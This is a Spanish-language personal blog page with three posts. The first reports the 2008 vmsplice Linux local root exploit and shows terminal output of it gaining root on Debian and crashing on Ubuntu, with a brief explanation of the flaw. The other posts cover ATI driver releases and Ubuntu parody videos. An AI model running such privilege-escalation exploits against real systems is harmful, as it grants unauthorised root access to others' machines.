Alejandra Ramírez

Home Page

jessica biel naked in my bed

February11

Ayer (10 de febrero de 2008) se dio a conocer un exploit: jessica_biel_naked_in_my_bed.c que afectaba a los kernels que van del 2.6.17 al 2.6.24.

Cualquier usuario con acceso al servidor (ssh, telenet,…) podia compilar y correr tal exploit, ganando, como consecuencia, id de superusuario.

En mi caso (obteniendo el código en slashdot), el exploit me funcionó en un sistema debian:


[aramirez@debian]~> ./jessica_biel_naked_in_my_bed
———————————–
Linux vmsplice Local Root Exploit
By qaaz
———————————–
[+] mmap: 0×0 .. 0×1000
[+] page: 0×0
[+] page: 0×20
[+] mmap: 0×4000 .. 0×5000
[+] page: 0×4000
[+] page: 0×4020
[+] mmap: 0×1000 .. 0×2000
[+] page: 0×1000
[+] mmap: 0xb7db8000 .. 0xb7dea000
[+] root
root@debian:~# id
uid=0(root) gid=0(root) groups=500(users)

más no en un ubuntu:


alex@nopalitux-desktop:~$ ./jessica_biel_naked_in_my_bed
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0×0 .. 0×1000
[+] page: 0×0
[+] page: 0×20
[+] mmap: 0×4000 .. 0×5000
[+] page: 0×4000
[+] page: 0×4020
[+] mmap: 0×1000 .. 0×2000
[+] page: 0×1000
[+] mmap: 0xb7e1b000 .. 0xb7e4d000
Fallo de segmentación
alex@nopalitux-desktop:~$

La vulnerabilidad del kernel (que obviamente incumbe a todas las distros: Debian, gentoo, red hat, fedora, slackware, opensuse, etc. ) hace uso del módulo vmsplice, incorporado precisamente en la version 2.6.17 del mismo como una más de las buenas caracterí­sticas en ese entonces implementadas (más información sobre vmsplice en http://lwn.net/Articles/181169/). Esta vulnerabilidad afecta especí­ficamente la syscall de vmsplice
otorgando acceso a lectura/escritura en posiciones arbitrarias de memoria.

Read the rest of this entry »

posted under GNU/Linux | No Comments »

Ati libera controladores 2D y 3D para linux

September12

ati linux

Esta semana fueron liberados por parte de ATI los controladores para sus tarjetas de video (aquí­ la noticia).

Hasta este momento definitivamente NVidia tomó la delantera y yo viví­a algo arrepentida de tener una Ati Radeon X700 Pro (eso sí­, con aceleración gráfica lograda).

Aun cuando Compiz no gasta muchos recursos de la tarjeta, sin duda alguno para los usuarios de Ati esto promete una mejora en el desempeño y rendimiento gráfico.

Adios a XGL y bienvenido AIGLX

posted under GNU/Linux | 3 Comments »

Get a Mac? Get Ubuntu?

June1

Parece ser que en respuesta a la campaña publicitaria lanzada por Apple: “Get a Mac “, el grupo español de HacheMuda se dió a la tarea de crear también sus videos Get Ubuntu, en los que bajo la misma temática (un personaje llamado “mac” y uno llamado “pc” en la campaña de la manzana y ahora un personaje llamado “mac” con varios llamados “ubuntu” en los videos de hachemuda) intentan mostrar, como ellos mismos lo escriben, las virtudes que sólo Ubuntu posee.

Aquí­ el primero de los videos que salieron puntualmente (al más puro estilo Ubuntu ;-) ) del 28 de mayo al 1 de junio:

YouTube Preview Image

Aunque los videos no sean comerciales como los de Apple, los españoles de hachemuda lograron una buena parodia a éstos.

Aprovecho el post para invitar a quien no haya probado Ubuntu aun, a que descargue su copia o bien la solicite a domicilio, al fin que si llega a extrañar a su anterior sistema operativo para algo en especial, siempre lo puede dejar en una partición del disco duro o mejor aun: instalarlo dentro de Ubuntu:

YouTube Preview Image

o bien:
YouTube Preview Image

posted under Apple, GNU/Linux, Humor | No Comments »
« Older Entries

















alejandraramirez.com is powered by Wordpress and based in the Chaos theme. Some sponsors of the site are: